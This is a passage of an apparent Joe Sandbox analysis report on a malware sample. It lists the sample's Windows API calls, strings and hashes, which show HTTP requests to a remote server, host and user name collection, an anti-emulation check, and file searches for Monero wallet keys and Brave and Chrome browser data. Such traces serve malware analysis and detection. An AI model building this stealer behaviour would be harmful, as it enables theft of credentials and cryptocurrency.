                  • API ID: CrackInternetlstrlen
                  • String ID: <
                  • API String ID: 1274457161-4251816714
                  • Opcode ID: e5a9aeddea5511a7848ffc6312fb251b144f13c8ca7b907aeb0aec7cf36490bc
                  • Instruction ID: 2dee00600a4f1842fb017b2a12d845d0b2fc493cd090558736b6ee403e95eb39
                  • Opcode Fuzzy Hash: e5a9aeddea5511a7848ffc6312fb251b144f13c8ca7b907aeb0aec7cf36490bc
                  • Instruction Fuzzy Hash: B7214DB1D00209ABDF14DFA4E845ADE7B74FB45320F108625F965AB2C0EB706A19CF91

                  Control-flow Graph

                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A6280: InternetOpenA.WININET(002C0DFE,00000001,00000000,00000000,00000000), ref: 002A62E1
                    • Part of subcall function 002A6280: StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A6303
                    • Part of subcall function 002A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A6335
                    • Part of subcall function 002A6280: HttpOpenRequestA.WININET(00000000,GET,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A6385
                    • Part of subcall function 002A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002A63BF
                    • Part of subcall function 002A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002A63D1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002B5228
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                  • String ID: ERROR$ERROR
                  • API String ID: 3287882509-2579291623
                  • Opcode ID: 96cb97f2e1e83a266431b8fdbcc48375c93ca6ac261b2411344336037759b378
                  • Instruction ID: 87279de862f240f1d6be875d5ee5c669cc4127d7ad5473952c64dd28f81e4756
                  • Opcode Fuzzy Hash: 96cb97f2e1e83a266431b8fdbcc48375c93ca6ac261b2411344336037759b378
                  • Instruction Fuzzy Hash: 8811EC30920148BBDB14FF64DD52AED7778AF50380F804258F91A5A592EF30AB25CE91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: f24957267b9dbd1ae70b2752bb6ab538543db5e82f46366f906cdf47520e68d7
                  • Instruction ID: 422b96482dc7cff80d2241f92d7e048c1a139bba5ac7e7a60c7757bbdba475f4
                  • Opcode Fuzzy Hash: f24957267b9dbd1ae70b2752bb6ab538543db5e82f46366f906cdf47520e68d7
                  • Instruction Fuzzy Hash: DD01F9B1914644EFC700DF84CC45FEEBBB8F744B51F100229F601E3280C37459108BA1
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 002A112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 002A1132
                  • ExitProcess.KERNEL32 ref: 002A1143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: cc74ed422f880ffbf6d85a7c658f2772d913c8beb273e358c696691733667c7c
                  • Instruction ID: cb9f023abd04a2ebaf85136b30c894581bf1f78a033da6a5a8017ebfcf47bff4
                  • Opcode Fuzzy Hash: cc74ed422f880ffbf6d85a7c658f2772d913c8beb273e358c696691733667c7c
                  • Instruction Fuzzy Hash: FCE08670955348FFE710ABA09C0AB087A78AB04B11F104054F7087A1C1DAB436209A9D
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 002A10B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 002A10F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: 03be39d26fed32ff5f88b78cc2bb5a626965f9428c2152334f900b760c4c7417
                  • Instruction ID: c494966983fe7f7805f9875c8705f1b3c0e66659113eeb6b8cdb3c01b2e3581f
                  • Opcode Fuzzy Hash: 03be39d26fed32ff5f88b78cc2bb5a626965f9428c2152334f900b760c4c7417
                  • Instruction Fuzzy Hash: 37F0E971641204BBE7149AA49C49FAAB7ECE705715F300454F904E7280D571AE10CA64
                  APIs
                    • Part of subcall function 002B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002B7910
                    • Part of subcall function 002B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 002B7917
                    • Part of subcall function 002B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 002B792F
                    • Part of subcall function 002B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                    • Part of subcall function 002B7850: RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                    • Part of subcall function 002B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                  • ExitProcess.KERNEL32 ref: 002A11C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: baaf0716cbff8ffc75465a4d93c327d9e7c18a36a4d84125d24c6d315882bc60
                  • Instruction ID: 914683b37a50dfb9e85ee3654f4e12e174fafa1e47c54c452cd5967dab8b5cf0
                  • Opcode Fuzzy Hash: baaf0716cbff8ffc75465a4d93c327d9e7c18a36a4d84125d24c6d315882bc60
                  • Instruction Fuzzy Hash: 29E012B593430253CA0077B0AC4AB6A369C5B553C5F040434FA0DD6103FE25F831DA6A
                  APIs
                  • wsprintfA.USER32 ref: 002B38CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B38E3
                  • lstrcat.KERNEL32(?,?), ref: 002B3935
                  • StrCmpCA.SHLWAPI(?,002C0F70), ref: 002B3947
                  • StrCmpCA.SHLWAPI(?,002C0F74), ref: 002B395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B3C67
                  • FindClose.KERNEL32(000000FF), ref: 002B3C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 0ece20c0f641f3130a3c8fff04959e4cde7f94a32a7957154ee3c1ca3ecbdf73
                  • Instruction ID: 1e48ea490ba421c0077682efd35ab81a2df0d6f4cd5dc30be45934f7fb95a4ac
                  • Opcode Fuzzy Hash: 0ece20c0f641f3130a3c8fff04959e4cde7f94a32a7957154ee3c1ca3ecbdf73
                  • Instruction Fuzzy Hash: 4FA162B1910258ABDB24DFA4DC85FEE7378BF45340F044598F60D96141EB74ABA4CF62
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                  • FindFirstFileA.KERNEL32(00000000,?,002C0B32,002C0B2B,00000000,?,?,?,002C13F4,002C0B2A), ref: 002ABEF5
                  • StrCmpCA.SHLWAPI(?,002C13F8), ref: 002ABF4D
                  • StrCmpCA.SHLWAPI(?,002C13FC), ref: 002ABF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AC7BF
                  • FindClose.KERNEL32(000000FF), ref: 002AC7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: c421ab4550fea4c7c648f4e42f2b564bacfee97fef2d0bbb30061fe875087938
                  • Instruction ID: a8053045178203aa13f30c718b0d8dfd72957c591df649b063a2a2135cbf07df
                  • Opcode Fuzzy Hash: c421ab4550fea4c7c648f4e42f2b564bacfee97fef2d0bbb30061fe875087938
                  • Instruction Fuzzy Hash: 02423672920104ABDB14FB70DD96EED737DAF54340F404568F90AA6181EF34AB69CFA2
                  APIs
                  • wsprintfA.USER32 ref: 002B492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                  • StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                  • StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                  • FindClose.KERNEL32(000000FF), ref: 002B4B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 7c223b6c3bf7edfe4d7a2f21531cd968324a713cb079210d3a4fda06bb368fa7
                  • Instruction ID: 83886de7b4513e2ad20ba1d8e54d2e769a0ef643a0531bea47c72234d27094e9
                  • Opcode Fuzzy Hash: 7c223b6c3bf7edfe4d7a2f21531cd968324a713cb079210d3a4fda06bb368fa7
                  • Instruction Fuzzy Hash: AE6143B1910258ABCB20EFA0DC85FEA737CBB49700F04469CB64996141EE71EBA5CF95
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 002B4580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B4587
                  • wsprintfA.USER32 ref: 002B45A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B45BD
                  • StrCmpCA.SHLWAPI(?,002C0FC4), ref: 002B45EB
                  • StrCmpCA.SHLWAPI(?,002C0FC8), ref: 002B4601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B468B
                  • FindClose.KERNEL32(000000FF), ref: 002B46A0
                  • lstrcat.KERNEL32(?,00D5FC40), ref: 002B46C5
                  • lstrcat.KERNEL32(?,00D5E088), ref: 002B46D8
                  • lstrlen.KERNEL32(?), ref: 002B46E5
                  • lstrlen.KERNEL32(?), ref: 002B46F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 79fa52039a51022ef8fb110fd1f052e3a18f475c5a876c85e30460bc9aaac6cd
                  • Instruction ID: d369fbdb70789323f8147ca05fb8693c7aef297f937a4ac3ad0fdb6645ec42bb
                  • Opcode Fuzzy Hash: 79fa52039a51022ef8fb110fd1f052e3a18f475c5a876c85e30460bc9aaac6cd
                  • Instruction Fuzzy Hash: 4E5144B5910218ABCB24FB70DCC9FE9777CAB54300F404598B60996191EF74ABA4CF96
                  APIs
                  • wsprintfA.USER32 ref: 002B3EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 002B3EDA
                  • StrCmpCA.SHLWAPI(?,002C0FAC), ref: 002B3F08
                  • StrCmpCA.SHLWAPI(?,002C0FB0), ref: 002B3F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002B406C
                  • FindClose.KERNEL32(000000FF), ref: 002B4081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 84d294198a45c3748f0229048a1c924d1c54ef572fdc8a6131a7cbb96396ac0d
                  • Instruction ID: a4924c888034aff27654548250ca9c041f8b543e4d6610c8ae6b9da846e58d6b
                  • Opcode Fuzzy Hash: 84d294198a45c3748f0229048a1c924d1c54ef572fdc8a6131a7cbb96396ac0d
                  • Instruction Fuzzy Hash: 9C5153B6910218ABCB24FBB0DC85EEA737CBB44300F40459CB65996041DF75EBA5CF95
                  APIs
                  • wsprintfA.USER32 ref: 002AED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 002AED55
                  • StrCmpCA.SHLWAPI(?,002C1538), ref: 002AEDAB
                  • StrCmpCA.SHLWAPI(?,002C153C), ref: 002AEDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002AF2AE
                  • FindClose.KERNEL32(000000FF), ref: 002AF2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp
